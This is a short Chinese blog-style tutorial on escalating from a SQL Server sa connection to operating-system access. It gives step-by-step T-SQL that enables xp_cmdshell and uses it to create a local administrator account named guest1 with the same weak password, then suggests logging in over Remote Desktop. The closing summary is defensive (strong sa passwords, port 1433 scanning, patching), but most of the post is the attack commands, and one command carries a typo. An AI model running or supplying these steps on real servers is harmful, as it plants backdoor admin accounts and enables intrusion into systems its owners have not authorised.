根据数据库连接，登录操作系统的一个方法

如果你用sa帐号与数据库建立了连接，那么你便可以通过如下方法登录操作系统

1、开启xp_cmdshell配置权限

exec sp_configure 'show advanced options',1

go

reconfigure

go

exec sp_configure 'xp_cmdshell',1

go

reconfigurer

2、建立登录帐号

exec xp_cmdshell 'net user guest1 guest1 /add'
exec xp_cmdshell 'net localgroup administrators guest1 /add'
exec xp_cmdshell 'net user'

 第一行是创建帐号，用户名密码是guest1，第二行将帐号添加到administrators组，第三行显示操作系统内帐号

3、远程桌面连接试试，看是否用上述帐号能够登上远程的操作系统

 以上代码仅做测试使用，如果未成功可能与本地设置有关。

总结：

1、sa帐号密码复杂度一定高，破解了sa密码，就相当于进入了操作系统，权限越大，造成的损失就可能越大。

2、数据库连接是可以做很多事情的，所以很多扫描工具，sql server的端口1433是重点扫描的对象 。

3、及时给系统升级，打补丁。不给不法分子以可乘之机，防患于未然。